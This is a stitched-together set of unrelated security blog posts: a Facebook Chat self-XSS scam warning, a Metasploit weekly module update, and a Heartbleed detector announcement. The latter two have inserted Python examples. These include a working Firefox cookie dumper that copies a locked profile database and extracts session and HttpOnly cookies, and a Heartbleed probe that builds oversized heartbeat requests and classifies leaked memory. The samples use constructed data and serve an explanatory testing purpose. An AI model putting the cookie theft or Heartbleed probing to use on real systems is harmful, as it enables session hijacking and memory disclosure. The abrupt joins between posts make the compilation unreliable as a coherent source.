Facebook users are once again the target of a malicious scheme—this time in the form of a notification about “Facebook Chat”.
The spammed notification pretends to come from the “official Facebook Chat Team.” It tells users they have been tagged in a comment on a Facebook Note, and the Note contains a fake announcement about a Facebook Chat verification requirement.
Figure 1. Facebook Chat verification notification
The spam tries to sound urgent to convince users to verify their accounts. To do so, they are first asked to go to a Pastebin URL and are instructed to copy a specific piece of code. The instructions differ depending on which browser is being used (Google Chrome, Mozilla Firefox, or Internet Explorer).
From the get-go, users should know that there is no product called “Facebook Chat,” let alone a team that sends out a supposed “advisory” to its users. The social media site’s official instant messaging feature is called Facebook Messenger, which is also the name of its stand-alone app. Earlier this month, Facebook announced that Android and iOS users will be required to use this stand-alone app, as the chat feature is being removed from the main Facebook app.
Facebook has published an official warning about this technique. The warning notes, “This is a variant on the self-XSS attack. By pasting the code in the browser console, the user gives the code access to their account. The code usually posts the same scam on other people’s walls, and subscribes the user to pages controlled by the attacker – but it could do much worse things.”
In 2013, a mobile phishing page disguised as a legitimate Facebook mobile page was used to steal victims’ credit card details. In the same year, the Facebook Security Check page was spoofed by phishers, leading to a number of stolen account credentials.
Protecting your online accounts from such threats requires constant vigilance. Always check and verify links that are sent your way, even when they come from a friend or contact. Likewise, be selective about whom you add to your network: add only people you know personally, to reduce the risk of account compromise and of malware reaching your computer. Since April 2012, Trend Micro has worked hand in hand with Facebook to secure and shield users from attacks such as this. We already block all threats associated with this attack.
So, full disclosure: I haven't written an update blog post in almost a month. I'm a terrible person, I know. The reasons are many, of course -- we had a Metasploit 4.9 release at the tail end of March, and then we had this Heartbleed thing happen in early April which still continues to dominate the thoughts and action of everyone I know. Yeah, I don't know many people outside of security. I'm kind of a loser like that.
That said, the Metasploit juggernaut stops for no single bug. The exploit elves have been hard at work bringing in new non-Heartbleed exploits, so let's take a look at what's actually new this week. But first...
I promise I won't say Heartbleed again
But give me one or two more paragraphs just to get it out of my system. Today's release has both an updated Heartbleed server-side module and the new Heartbleed client-side module. Since it's client-side, you can't just "scan" your infrastructure for this vulnerability; the module stands up a listener and probes whichever TLS clients connect to it, so you need to get your network users to at least click a link. Lucky for you, though, you don't need to direct them to some site out on the Internet (and give away your security intelligence in the process).
Using the Metasploit module, it's pretty trivial to fire it up and test the client software you already use and trust for SSL communications. Does your phone's browser link against a vulnerable version of OpenSSL? Are you sure? How about that curl-based cron job you've been running for the last six months to snag the latest Dogecoin prices and trigger your buy and sell orders? Software like that is notoriously difficult to identify, let alone test, but with this module you can at least solve the testing part: point the client at the listener and see whether it hands back memory it shouldn't.
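One detail a client-side test harness needs before it sends anything: did the client advertise the TLS heartbeat extension (type 0x000f, RFC 6520) in its ClientHello, and in which mode? The parser below is an added example, not code from the Metasploit module; it builds a minimal constructed ClientHello (fixed random, two cipher suites, a signature_algorithms extension for the parser to step over) and reports the heartbeat mode so that "never advertised heartbeat" is logged as its own outcome instead of being folded into "did not leak".

```python
"""Report whether a TLS ClientHello advertises the heartbeat extension.

Added example for a Heartbleed client test listener (not the Metasploit
module). The ClientHello builder produces constructed test input only.
"""
import struct
from typing import Optional

HEARTBEAT_EXT_TYPE = 0x000F
MODE_NAMES = {1: "peer_allowed_to_send", 2: "peer_not_allowed_to_send"}


def build_client_hello(heartbeat_mode: Optional[int]) -> bytes:
    """Constructed TLS 1.2 ClientHello record with an optional heartbeat extension."""
    body = b"\x03\x03" + bytes(32)                      # client_version, random (fixed here)
    body += b"\x00"                                     # empty session_id
    suites = b"\x00\x2f\x00\x35"                        # AES128-SHA, AES256-SHA
    body += struct.pack("!H", len(suites)) + suites
    body += b"\x01\x00"                                 # one compression method: null
    exts = struct.pack("!HHH", 0x000D, 4, 2) + b"\x04\x01"   # signature_algorithms: rsa/sha256
    if heartbeat_mode is not None:
        exts += struct.pack("!HHB", HEARTBEAT_EXT_TYPE, 1, heartbeat_mode)
    body += struct.pack("!H", len(exts)) + exts
    handshake = b"\x01" + len(body).to_bytes(3, "big") + body   # HandshakeType client_hello
    return b"\x16\x03\x01" + struct.pack("!H", len(handshake)) + handshake


def heartbeat_mode(record: bytes) -> Optional[int]:
    """Return the advertised heartbeat mode (1 or 2), or None if absent.

    Raises ValueError on anything that is not a complete, well-formed ClientHello,
    so the harness logs a parse failure rather than guessing.
    """
    if len(record) < 5 or record[0] != 0x16:
        raise ValueError("not a TLS handshake record")
    rec_len = struct.unpack("!H", record[3:5])[0]
    hs = record[5:5 + rec_len]
    if len(hs) != rec_len or len(hs) < 4 or hs[0] != 0x01:
        raise ValueError("not a complete ClientHello")
    body = hs[4:4 + int.from_bytes(hs[1:4], "big")]

    def take(off: int, n: int) -> bytes:
        if off + n > len(body):
            raise ValueError("truncated ClientHello")
        return body[off:off + n]

    off = 2 + 32                                        # skip client_version + random
    sid_len = take(off, 1)[0]; off += 1 + sid_len
    cs_len = struct.unpack("!H", take(off, 2))[0]; off += 2 + cs_len
    cm_len = take(off, 1)[0]; off += 1 + cm_len
    if off == len(body):
        return None                                     # no extensions block at all
    ext_total = struct.unpack("!H", take(off, 2))[0]; off += 2
    end = off + ext_total
    if end > len(body):
        raise ValueError("extensions block overruns ClientHello")
    while off + 4 <= end:
        etype, elen = struct.unpack("!HH", body[off:off + 4]); off += 4
        if off + elen > end:
            raise ValueError("extension overruns extensions block")
        data = body[off:off + elen]; off += elen
        if etype == HEARTBEAT_EXT_TYPE:
            if elen != 1 or data[0] not in MODE_NAMES:
                raise ValueError("malformed heartbeat extension")
            return data[0]
    return None


def describe_client(record: bytes) -> str:
    """One log line per connecting client for the test harness."""
    mode = heartbeat_mode(record)
    if mode is None:
        return "no heartbeat extension advertised (OpenSSL 1.0.1 built with heartbeats advertises it by default)"
    return f"heartbeat extension, {MODE_NAMES[mode]}"
```

Mode 1 (peer_allowed_to_send) is what a default OpenSSL 1.0.1 client sends and is the case worth probing; mode 2 means the client has asked not to receive heartbeat requests, which is worth recording separately because a conforming client will not answer them.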
I promise, I'll shut my yap about Heartbleed now, and just be thankful for the continued job security that it's providing for me and all my friends.
More Firefox skulduggery
People download crap from the Internet all the time. This is a demonstrable fact which causes no end of frustration to IT administrators and security-minded family members alike. "But I'm no dummy," your users (or mother) might say, "I don't use MSIE on Windows -- I use Firefox on a Mac! Totally safe and virus free!"
Well, Rapid7's own Joe Vennix has been on a tear with Firefox lately. He's got three more post modules for unlucky Firefox users -- a cookie stealer (actually, released with 4.9.2), a browser history revealer, and, best of all, a saved password dumper. These all get really useful if you happen to have a browser exploit that can take advantage of the Firefox privileged payloads. Oh, and by "exploit," you can take that to also mean, "a malicious add-on that the user opted into."
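To make concrete what a cookie-stealing post module has to do once it has a foothold, here is an added example in Python that is not Joe Vennix's module. It reads a Firefox profile's cookies.sqlite through the two steps that matter in practice: Firefox keeps the database open (and locked) while running, so the reader works from a copy including any WAL sidecar files; and expired or off-target rows are dropped. The moz_cookies table below is a reduced version of Firefox's schema (real column names, trimmed column set), and every row is constructed.

```python
"""Dump live cookies from a Firefox cookies.sqlite, working from a copy.

Added example; not Metasploit's firefox cookie post module. REDUCED_SCHEMA keeps
the real moz_cookies column names but drops columns this example does not use.
"""
import os
import shutil
import sqlite3
import tempfile
import time
from typing import Dict, List, Optional

REDUCED_SCHEMA = """CREATE TABLE moz_cookies (
  id INTEGER PRIMARY KEY, name TEXT, value TEXT, host TEXT, path TEXT,
  expiry INTEGER, isSecure INTEGER, isHttpOnly INTEGER)"""


def build_sample_profile_db(path: str, now: int) -> None:
    """Write a constructed cookies.sqlite with live, expired and HttpOnly rows."""
    con = sqlite3.connect(path)
    con.execute(REDUCED_SCHEMA)
    rows = [  # constructed data
        ("sessionid", "s3ss10n", ".example.com", "/", now + 3600, 1, 1),
        ("prefs", "dark", ".example.com", "/", now + 86400, 0, 0),
        ("old", "stale", ".example.com", "/", now - 60, 0, 0),
        ("track", "abc", ".ads.example.net", "/", now + 3600, 0, 0),
    ]
    con.executemany(
        "INSERT INTO moz_cookies (name,value,host,path,expiry,isSecure,isHttpOnly)"
        " VALUES (?,?,?,?,?,?,?)", rows)
    con.commit()
    con.close()


def dump_cookies(db_path: str, host_suffix: Optional[str] = None,
                 now: Optional[int] = None) -> List[Dict[str, object]]:
    """Return unexpired cookies, optionally only those whose host ends in host_suffix."""
    now = int(time.time()) if now is None else now
    with tempfile.TemporaryDirectory() as tmp:
        copy = os.path.join(tmp, "cookies.sqlite")
        shutil.copy2(db_path, copy)                 # Firefox holds the original open
        for side in ("-wal", "-shm"):               # WAL sidecars hold unflushed writes
            if os.path.exists(db_path + side):
                shutil.copy2(db_path + side, copy + side)
        con = sqlite3.connect(copy)
        sql = ("SELECT name,value,host,path,expiry,isSecure,isHttpOnly"
               " FROM moz_cookies WHERE expiry > ?")
        args: List[object] = [now]
        if host_suffix:
            sql += " AND host LIKE ?"
            args.append("%" + host_suffix)
        sql += " ORDER BY id"
        out = [dict(name=n, value=v, host=h, path=p, expiry=e,
                    secure=bool(s), httponly=bool(ho))
               for n, v, h, p, e, s, ho in con.execute(sql, args)]
        con.close()
    return out


def demo(now: int) -> Dict[str, List[Dict[str, object]]]:
    """Build the constructed profile in a scratch directory and dump it both ways."""
    with tempfile.TemporaryDirectory() as tmp:
        db = os.path.join(tmp, "cookies.sqlite")
        build_sample_profile_db(db, now)
        return {"all": dump_cookies(db, now=now),
                "example_com": dump_cookies(db, host_suffix="example.com", now=now)}


if __name__ == "__main__":
    for cookie in demo(int(time.time()))["all"]:
        print(cookie)
```

The HttpOnly flag is the one to look at in the output: a cookie the page's own JavaScript can never read is exactly what a privileged payload or a post-exploitation module gets hold of anyway, which is the point the paragraph above is making about the real risk of a Firefox compromise.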
What this all boils down to is, the crafty penetration tester can use these Metasploit post-exploit modules to help illustrate the true risk to an organization from a Firefox-based compromise. That's a nice win.
New Modules
We have eight new modules this week for you, including the ones mentioned above. You know what to do.
- eScan Web Management Console Command Injection by juan vazquez and Joxean Koret
- Sophos Web Protection Appliance Interface Authenticated Arbitrary Command Execution by Brandon Perry exploits ZDI-14-069
- Vtiger Install Unauthenticated Remote Command Execution by Jonathan Borgeaud exploits CVE-2014-2268
- MS14-017 Microsoft Word RTF Object Confusion by Haifei Li, Spencer McIntyre, and unknown exploits CVE-2014-1761
Auxiliary and post modules
- OpenSSL Heartbeat (Heartbleed) Client Memory Exposure by hdm, Antti, Matti, Neel Mehta, and Riku exploits CVE-2014-0160
- Windows Gather Enumerate Active Domain Users by Ben Campbell and Etienne Stalmans
If you're new to Metasploit, you can get started by downloading Metasploit for Linux or Windows, either the totally free Metasploit Community Edition, or the 14-day free trial of Metasploit Pro. If you're the sort to track bleeding-edge development code, then these modules are but an msfupdate command away. For readers who are already using Metasploit Community or Metasploit Pro, you'll be able to install the new hotness today via the Administration : Software Updates button.
In previous blog entries, we’ve discussed various aspects of the Heartbleed vulnerability in OpenSSL. Last Tuesday, our first blog post covered an analysis of the vulnerability itself, as well as some steps that IT administrators of affected systems could take to protect themselves. Later entries looked at how popular websites and mobile apps were, in their own ways, vulnerable to the threat.
To help deal with the Heartbleed vulnerability, we’ve released several tools that can be used to detect possible exposure to the risks:
We have released the Trend Micro Heartbleed Detector on the Google Play store. This tool is designed to help users tell if they are vulnerable to any aspect of this threat. In particular, it checks for three things:
- It checks whether the version of OpenSSL used in the device’s version of Android may be vulnerable.
- It checks whether any OpenSSL libraries embedded in the user’s installed apps may be vulnerable.
- It checks whether the user’s installed apps communicate to any unpatched (and therefore, vulnerable) servers.
Figure 1. Detector application
If any vulnerable apps are detected, the detector offers to uninstall the app for the user:
Figure 2. Vulnerable app detected
We don’t recommend that users immediately uninstall all vulnerable apps, but this is something everyone should consider for applications that handle sensitive information, such as mobile banking apps. In addition, it’s a good idea for users to contact the companies that maintain these vulnerable apps and ask them to update their apps or websites as soon as possible.
For Chrome users, we’ve also released the Trend Micro OpenSSL Heartbleed Scanner app. The scanner lets users check whether specific sites are vulnerable to Heartbleed. The tool can be downloaded from the Chrome Web Store.
For other users who want to check if a site is vulnerable or not, you may also do so through our Trend Micro Heartbleed Detector website.
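What a site or server scanner of this kind actually does is modelled below, as an added example that is not the Trend Micro scanner (nor the Metasploit module). It builds the HeartbeatRequest a scanner sends, models the server's heartbeat handler in both its vulnerable and patched forms (a stand-in for OpenSSL's tls1_process_heartbeat, with constructed bytes in place of real process memory), and classifies the reply with the rule every scanner uses: a response carrying more payload than was sent is a leak, while OpenSSL 1.0.1g silently discards a request whose payload_length exceeds the record and sends nothing.

```python
"""Heartbleed (CVE-2014-0160) probe logic, modelled offline.

Added example; not Trend Micro's or Metasploit's code. model_server() is a
stand-in for the server side, not OpenSSL; memory_after_request is constructed
data standing in for whatever followed the request in the read buffer.
"""
import struct
from typing import Dict

TLS_ALERT, TLS_HEARTBEAT = 0x15, 0x18
HB_REQUEST, HB_RESPONSE = 1, 2
MAX_FRAGMENT = 16384                   # TLS record plaintext limit
PADDING = bytes(16)                    # RFC 6520 minimum padding


def build_heartbeat_request(claimed_len: int, payload: bytes,
                            version: bytes = b"\x03\x02") -> bytes:
    """HeartbeatRequest whose payload_length field need not match the payload.

    A scanner sends a short payload with a large claimed_len; an honest peer
    sets claimed_len == len(payload).
    """
    msg = struct.pack("!BH", HB_REQUEST, claimed_len) + payload + PADDING
    return struct.pack("!B", TLS_HEARTBEAT) + version + struct.pack("!H", len(msg)) + msg


def _records(msg: bytes, ctype: int, version: bytes = b"\x03\x02") -> bytes:
    """Split a message into TLS records of at most MAX_FRAGMENT bytes each."""
    out = b""
    for i in range(0, len(msg), MAX_FRAGMENT):
        chunk = msg[i:i + MAX_FRAGMENT]
        out += struct.pack("!B", ctype) + version + struct.pack("!H", len(chunk)) + chunk
    return out


def model_server(request: bytes, patched: bool, memory_after_request: bytes) -> bytes:
    """Stand-in for the server's heartbeat handler (constructed, not OpenSSL)."""
    rec_len = struct.unpack("!H", request[3:5])[0]
    msg = request[5:5 + rec_len]
    hb_type, payload_len = struct.unpack("!BH", msg[:3])
    if hb_type != HB_REQUEST:
        return b""
    if patched and 1 + 2 + payload_len + 16 > rec_len:
        return b""                     # the 1.0.1g fix: silently discard (RFC 6520, section 4)
    # Vulnerable path: the copy trusts the peer's payload_length and reads past
    # the end of the record into whatever sits next in the read buffer.
    source = msg[3:] + memory_after_request
    echoed = source[:payload_len]
    response = struct.pack("!BH", HB_RESPONSE, payload_len) + echoed + PADDING
    return _records(response, TLS_HEARTBEAT)


def analyze_response(raw: bytes, sent_payload: bytes) -> Dict[str, object]:
    """Reassemble heartbeat records and decide whether the peer over-read."""
    off, hb = 0, b""
    while off + 5 <= len(raw):
        ctype = raw[off]
        length = struct.unpack("!H", raw[off + 3:off + 5])[0]
        body = raw[off + 5:off + 5 + length]
        off += 5 + length
        if ctype == TLS_ALERT:
            return {"verdict": "alert", "leaked": b""}
        if ctype == TLS_HEARTBEAT:
            hb += body                 # a large reply spans several records
    if len(hb) < 3:
        return {"verdict": "no_response", "leaked": b""}
    hb_type, payload_len = struct.unpack("!BH", hb[:3])
    if hb_type != HB_RESPONSE:
        return {"verdict": "unexpected", "leaked": b""}
    payload = hb[3:3 + payload_len]
    if payload_len > len(sent_payload) and len(payload) > len(sent_payload):
        return {"verdict": "vulnerable", "leaked": payload[len(sent_payload):]}
    return {"verdict": "not_vulnerable", "leaked": b""}
```

Against a live host the request goes out right after the ServerHello, while the connection is still unencrypted, and the socket needs a read timeout: a patched server answers an oversized request with silence, and the scanner must treat that silence as the patched signature rather than hang. Note that the model's leaked bytes start with the request's own padding, which is also what a real leak looks like.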
We will continue to monitor this issue and release more information as needed. For other posts discussing the Heartbleed bug, check our entries from the past week:
- Bundled OpenSSL Library Also Makes Apps and Android 4.1.1 Vulnerable to Heartbleed
- Heartbleed Bug—Mobile Apps are Affected Too
- Heartbleed Vulnerability Affects 5% of Select Top Level Domains from Top 1M
- Skipping a Heartbeat: The Analysis of the Heartbleed OpenSSL Vulnerability